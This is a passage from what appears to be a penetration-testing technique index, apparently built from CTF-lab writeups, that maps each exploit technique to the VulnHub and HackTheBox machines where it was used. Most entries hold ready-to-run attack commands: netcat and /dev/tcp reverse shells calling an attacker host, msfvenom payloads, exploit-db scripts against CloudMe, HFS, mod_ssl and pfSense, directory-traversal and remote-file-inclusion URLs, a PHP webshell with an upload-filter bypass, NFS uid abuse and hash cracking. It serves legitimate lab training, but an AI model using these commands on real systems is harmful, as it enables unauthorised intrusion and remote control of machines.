spawn a bash reverse shell to gain interactive access on the target system
```shell
nc -nlvp <attackerport>
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <attackerip> <attackerport> >/tmp/f
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) |
[+] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
[+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells
---
<a name="exploit_bof"></a>
#### exploit_bof [⇡](#exploit)
create a bof exploit to execute arbitrary code and gain interactive access on the target system
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100" /> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) |
---
<a name="exploit_cloudme_bof"></a>
#### exploit_cloudme_bof [⇡](#exploit)
the CloudMe version 1.11.12 is vulnerable to a buffer overflow that could be used to gain interactive access on the target system, possibly with elevated privileges
```shell
msfvenom -p windows/shell_reverse_tcp lhost=<attackerip> lport=<attackerport> -b "\x00\x0a\x0d" -f python -a x86 --platform windows -e x86/shikata_ga_nai
sudo nc -nlvp <attackerport>
python 48389.py
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf) | [htb#263](https://app.hackthebox.eu/machines/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) |
[+] https://www.exploit-db.com/exploits/48389
---
<a name="exploit_cmdexec"></a>
#### exploit_cmdexec [⇡](#exploit)
execute arbitrary commands via a command execution vulnerability and gain interactive access on the target system
```shell
nc -nlvp <attackerport>
bash -i >& /dev/tcp/<attackerip>/<attackerport> 0>&1
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) |
---
<a name="exploit_coldfusion_dirtraversal"></a>
#### exploit_coldfusion_dirtraversal [⇡](#exploit)
coldfusion 8 is vulnerable to a directory traversal and exposes SHA1 hash of the user password
```shell
http://<targetip>:<targetport>/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
```
[+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560
[+] https://www.exploit-db.com/exploits/14641
---
<a name="exploit_coldfusion_scheduledtasks"></a>
#### exploit_coldfusion_scheduledtasks [⇡](#exploit)
coldfusion 8 allows to obtain remote shell by creating and executing a new scheduled task. this is a post-authentication vulnerability
```shell
http://<targetip>:<targetport>/CFIDE/administrator/enter.cfm
http://<targetip>:<targetport>/CFIDE/administrator/settings/mappings.cfm # check the CFIDE logical path mapping to identify the file upload location, C:\ColdFusion8\wwwroot\CFIDE
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f raw >revshell.jsp
nc -nlvp <attackerport>
http://<targetip>:<targetport>/CFIDE/administrator/scheduler/scheduletasks.cfm
# set url to revshell.jsp link
# mark the save output to file option
# set file to C:\ColdFusion8\wwwroot\CFIDE\revshell.jsp
# run the scheduled task on demand to upload the revshell.jsp file
http://<targetip>:<targetport>/CFIDE/revshell.jsp
```
[+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560
---
<a name="exploit_command_injection"></a>
#### exploit_command_injection [⇡](#exploit)
certain webapps couldbe vulebrable to command injection via input text fields
```shell
# submit escaped input: "\";whoami\n"
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) |
[+] https://muirlandoracle.co.uk/2020/05/30/year-of-the-fox-write-up/
---
<a name="exploit_credsreuse"></a>
#### exploit_credsreuse [⇡](#exploit)
Reuse credentials already found for a service to interact with another service
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
| 2. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) |
| 3. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) |
| 4. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) |
| 5. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) |
---
<a name="exploit_defaultcreds"></a>
#### exploit_defaultcreds [⇡](#exploit)
Use default credentials to interact with a service
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Mirai](https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf) | [htb#64](https://app.hackthebox.eu/machines/64) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png" width="100" height="100" /> | [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
---
<a name="exploit_drupal_passwordcrack"></a>
#### exploit_drupal_passwordcrack [⇡](#exploit)
Crack a drupal password hash
```shell
hashcat -m 7900 hash.txt /usr/share/wordlists/rockyou.txt -o cracked.txt --force
```
[+] https://0xdf.gitlab.io/2019/03/12/htb-bastard.html
---
<a name="exploit_ftp_anonymous"></a>
#### exploit_ftp_anonymous [⇡](#exploit)
Interact with the ftp service using `anonymous/any` credentials
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) |
---
<a name="exploit_ftp_web_root"></a>
#### exploit_ftp_web_root [⇡](#exploit)
FTP server's root directory is mapped to the web server's root directory. Upload a reverse shell file native to the web server using ftp server (`anonymous` login or default creds or creds reuse or some exploit) and trigger it's execution to gain interactive access on the target system
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) |
---
<a name="exploit_gpp_groupsxml"></a>
#### exploit_gpp_groupsxml [⇡](#exploit)
the Groups.xml file lists username and encrypted password that can be useful to gain initial access on the target system. access this file via an open ftp/smb share or some other method
```shell
smbclient //10.10.10.100/Replication
get ..\\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml Groups.xml
exit
cat Groups.xml
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
smbclient //10.10.10.100/Users -U SVC_TGS
```
[+] https://0xrick.github.io/hack-the-box/active/
[+] https://adsecurity.org/?p=2288
---
<a name="exploit_gymsystem_rce"></a>
#### exploit_gymsystem_rce [⇡](#exploit)
use `/contacts.php` to confirm the version is 1.0 and fire this exploit to get a pseudo-interactive shell on the target machine. you can
```shell
python 48506.py http://<targetip>:<targetport>/
curl "http://<targetip>:<targetport>/upload/kamehameha.php?telepathy=whoami"
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf) | [htb#263](https://app.hackthebox.eu/machines/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) |
[+] https://www.exploit-db.com/exploits/48506
---
<a name="exploit_hfs_cmd_exec"></a>
#### exploit_hfs_cmd_exec [⇡](#exploit)
HFS (`HttpFileServer 2.3.x`) is vulnerable to remote command execution
```shell
python 39161.py <targetip> <targetport>
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Optimum](https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf) | [htb#6](https://app.hackthebox.eu/machines/6) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png" width="100" height="100" /> | [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) |
[+] https://www.exploit-db.com/exploits/39161
[+] https://nvd.nist.gov/vuln/detail/CVE-2014-6287
---
<a name="exploit_iis_asp_reverseshell"></a>
#### exploit_iis_asp_reverseshell [⇡](#exploit)
use an `asp`|`aspx` reverse shell to gain interactive access on the target system. useful when Microsoft IIS server is found during enumeration. might need a separate vulnerability to upload the reverse shell file on target system (use burp to bypass filename filter - revshell.aspx%00.jpg)
```shell
msfvenom -p windows/shell/reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f asp >rs.asp
msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f aspx >rs.aspx
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) |
[+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#kali-aspx-shells
---
<a name="exploit_iis_webdav"></a>
#### exploit_iis_webdav [⇡](#exploit)
multiple iis webdav issues. can use msf exploits `windows/iis/iis_webdav_scstoragepathfromurl` or `windows/iis/iis_webdav_upload_asp` to gain interactive access on the target system
```shell
msfconsole
use windows/iis/iis_webdav_scstoragepathfromurl
set rhost <targetip>
set rport <targetport>
show options
exploit
use windows/iis/iis_webdav_upload_asp
set rhost <targetip>
set rport <targetport>
show options
exploit
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Grandpa](https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf) | [htb#13](https://app.hackthebox.eu/machines/13) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070) |
| 2. | [Granny](https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf) | [htb#14](https://app.hackthebox.eu/machines/14) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051) |
[+] https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_scstoragepathfromurl
[+] https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_upload_asp
---
<a name="exploit_lotuscms"></a>
#### exploit_lotuscms [⇡](#exploit)
LotusCMS is vulnerable to remote code execution
```shell
nc -nlvp <attackerport>
./lotusRCE.sh <targetip>
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100" /> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) |
[+] https://github.com/Hood3dRob1n/LotusCMS-Exploit/blob/master/lotusRCE.sh
---
<a name="exploit_modssl"></a>
#### exploit_modssl [⇡](#exploit)
Apache `mod_ssl < 2.8.7` is vulnerable to remote code execution
```shell
gcc -o 47080 47080.c -lcrypto
./47080
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
./47080 0x6b <targetip> <targetport>
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Kioptrix: Level 1 (#1)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf) | [vh#22](https://www.vulnhub.com/entry/kioptrix-level-1-1,22/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png" width="100" height="100" /> | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) |
[+] https://www.exploit-db.com/exploits/47080
[+] https://nvd.nist.gov/vuln/detail/CVE-2002-0082
---
<a name="exploit_mongodb"></a>
#### exploit_mongodb [⇡](#exploit)
```shell
nc -nlvp <attackerport>
mongo -p -u <user> <record>
db.tasks.insert({"cmd": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerip> <attackerport> >/tmp/f"})
bye
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) |
---
<a name="exploit_nfs_rw"></a>
#### exploit_nfs_rw [⇡](#exploit)
when an open nfs share is found, look for available mountpoints, mount using `nfsv3` so that we can see the real remote `uid` and `gid`, create a new user with expected `uid`, switch user, create the `.ssh` directory, copy `id_rsa.pub` to this directory and ssh to gain interactive access on the target system
```shell
check available mountpoints
mount file system via nfs v3
check uid of user
create a new local user with nfs user's uid
change to new user
copy ssh public key to .ssh/authorized_keys file
ssh into the target as user
copy root owned copy of bash from local system to nfs mount
running "./bash -p" gives root access as euid is carried over during copy operation
mount nfsv3, create new user with nfs user uid and get root shell
unmount and remove temporary user:
showmount -e <targetip>
mkdir /tmp/nfs
mount <targetip>:/home/vulnix /tmp/nfs -o vers=3 # nfs v3 allows listing of user ids for shared files
ls -l /tmp/nfs # check the uid and use it to create new user
useradd -u 2008 vulnix
su vulnix
copy ~/.ssh/id_rsa.pub to ~/.ssh/authorized_keys on target host to gain passwordless ssh access
umount /tmp/nfs ; userdel vulnix
showmount -e <targetip>
Export list for <targetip>:
/home/vulnix *
mkdir ./mnt/
mount <targetip>:/home/vulnix ./mnt -o vers=3
ls -l
groupadd --gid 2008 vulnix ; useradd --uid 2008 --groups vulnix vulnix
cp ~/.ssh/id_rsa.pub ./authorized_keys
su vulnix
cd ./mnt/
mkdir .ssh/
cp ./authorized_keys ./.ssh/
exit
ssh vulnix@<targetip>
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) |
| 2. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) |
[+] https://blog.christophetd.fr/write-up-vulnix/
---
<a name="exploit_nodejs"></a>
#### exploit_nodejs [⇡](#exploit)
inspect source for `assets/js/app/controllers/*.js` files and look for rest api calls that could leak sensitive information
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) |
---
<a name="exploit_nodejs_deserialize"></a>
#### exploit_nodejs_deserialize [⇡](#exploit)
user input is passed to `unserialize()` method that could allow remote code execution
[+] https://dastinia.io/write-up/hackthebox/2018/08/25/hackthebox-celestial-writeup/
[+] https://github.com/hoainam1989/training-application-security/blob/master/shell/node_shell.py
[+] https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py
[+] https://0xdf.gitlab.io/2018/08/25/htb-celestial.html
---
<a name="exploit_pchart"></a>
#### exploit_pchart [⇡](#exploit)
the `pChart 2.1.3` web application is vulnerable to directory traversal
```shell
http://<targetip>/pChart2.1.3/examples/index.php?Action=View&Script=/../../etc/passwd
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100" /> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) |
[+] https://www.exploit-db.com/exploits/31173
[+] https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb
---
<a name="exploit_pfsense"></a>
#### exploit_pfsense [⇡](#exploit)
pfsense 2.1.3 is vulnerable to command injection
```shell
python3 43560.py --rhost <targetip> --lhost <attackerip> --lport <attackerport> --username foo --password bar
```
[+] https://www.exploit-db.com/exploits/43560
[+] https://medium.com/@ranakhalil101/hack-the-box-sense-writeup-w-o-metasploit-ef064f380190
---
<a name="exploit_php_acs_rfi"></a>
#### exploit_php_acs_rfi [⇡](#exploit)
Advanced Comment System 1.0 is vulnerable to remote file inclusion and command execution attacks
```shell
curl -v "<targetip>/internal/advanced_comment_system/admin.php?ACS_path=php://input%00" -d "<?system('whoami');?>"
```
[+] https://www.exploit-db.com/exploits/9623
---
<a name="exploit_php_fileupload"></a>
#### exploit_php_fileupload [⇡](#exploit)
certain poorly developed php web applications allow unrestricted file uploads that can be abused to gain interactive access on the target system
```shell
cp /usr/share/webshells/php/php-reverse-shell.php ./rs.php
subl rs.php # point to <attackerip> and <attackerport>
nc -nlvp <attackerport>
# upload rs.php and trigger execution
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) |
| 2. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) |
| 3. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) |
---
<a name="exploit_php_fileupload_bypass"></a>
#### exploit_php_fileupload_bypass [⇡](#exploit)
add gif file magicbytes `GIF891` to a php reverse shell file, rename it to rs.php.gif and upload to bypass upload filter. sometimes, a restrictve waf might still stop file upload. in that case, use a minimal command execution php file with gif magicbytes instead of a full php reverse shell
```shell
cp /usr/share/webshells/php/php-reverse-shell.php ./rs.php.gif
subl rs.php.gif # point to <attackerip> and <attackerport> AND add GIF89a to the start of file
nc -nlvp <attackerport>
# upload rs.php.gif and trigger execution
###
echo -e 'GIF89a\n<?php $out=$_GET["cmd"]; echo `$out`; ?>' >cmd.gif
# upload and execute commands
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [IMF: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf) | [vh#162](https://www.vulnhub.com/entry/imf-1,162/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof) |
